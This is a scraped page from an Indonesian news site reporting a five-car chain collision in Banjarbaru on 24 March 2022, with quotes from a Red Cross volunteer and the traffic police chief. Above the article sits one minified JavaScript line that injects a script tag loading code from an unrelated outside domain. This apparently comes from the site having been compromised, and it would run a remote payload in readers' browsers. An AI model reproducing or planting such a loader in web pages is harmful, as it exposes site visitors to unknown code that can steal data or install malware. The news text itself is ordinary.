(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Tabrakan Beruntun di Jalam A Yani Km 29 Banjarbaru, Sejumlah Korban Alami Luka Memar


KANALKALIMANTAN.COM, BANJARBARU – Tabrakan beruntun yang mengakibatkan lima buah mobil di Jalan A Yani Km 29, Guntung Payung, Banjarbaru, Kamis (24/3/2022), menyebabkan beberapa orang yang mengalami luka ringan.

“Korbannya sebagian ditangani di tempat, sebagian ada yang membawa,” ucap Ahmad Rasyid Ridha, KSR PMI Kota Banjarbaru kepada kanalkalimantan.com, Kamis (24/3/2022) siang.

Dikatakan Rasyid, PMI Kota Banjarbaru hanya menangani dua orang sementara korban sisanya dibawa oleh petugas lain. Namun tujuannya tidak diketahuinya.

“Sebagian langsung dibawa, entah langsung ke Tahura atau ke rumah sakit karena tadi hanya sebagian yang mengalami luka-luka,” tambahnya.

 

Terkait tujuannya rombongan tersebut dikatakan Rasyid, mereka datang dari arah Banjarmasin menuju Tahura (Tan Hutan Raya) Sultan Adam, Mandiangin, Kabupaten Banjar.

 

Baca juga : KRONOLOGI. Kecelakaan Beruntun, Kasat Lantas Tegaskan Bukan Rombongan KLHK dan Kegiatan W20

“Kata mereka ingin ke Tahura,” jelasnya.

Untuk kronologinya dikatakan Rasyid dirinya belum mengetahu secara pasti, namun dari keterangan beberapa orang di lokasi, mobil paling depan mengerem mendadak.

“Rem mendadak yang di depan, tapi tidak tahu dari pihak kepolisian pastinya,” tuntasnya.

Sementara itu, Kasatlantas Polres Banjarbaru, Iptu Eko Guntar Lumbanraja mengatakan, berdasarkan laporan petugas yang ada di lapangan mendapati salah satu mobil melakukan pengereman mendadak, sehingga mengakibatkan kecelakaan tersebut.

“Benar, sementara demikian info awal yang kita terima,” ucapnya kepada Kanalkalimantan.com, Kamis (24/3/2022).

Terkait kabar beredar bahwa rombongan yang terlibat dalam tabrakan beruntun tersebut ditegaskan Iptu Guntar bukanlah dari rombongan Kementerian Lingkungan Hidup dan Kehutanan (KLHK) maupun dari rombongan kegiatan W20.

“Kendaraan yang terlibat kecelakaan bukan merupakan rombongan Kementerian Lingkungan Hidup atau rombongan dari kegiatan W20,” tegasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : cell


Desy Arfianty

Recent Posts

Dua Raperda Disahkan, Ketua DPRD: Payung Hukum yang Jelas Bagi Cagar Budaya di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dua buah Rancangan Peraturan Daerah (Raperda) Kota Banjarbaru disahkan dalam rapat paripurna… Read More

50 menit ago

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

3 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

5 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

6 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

6 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

20 jam ago

This website uses cookies.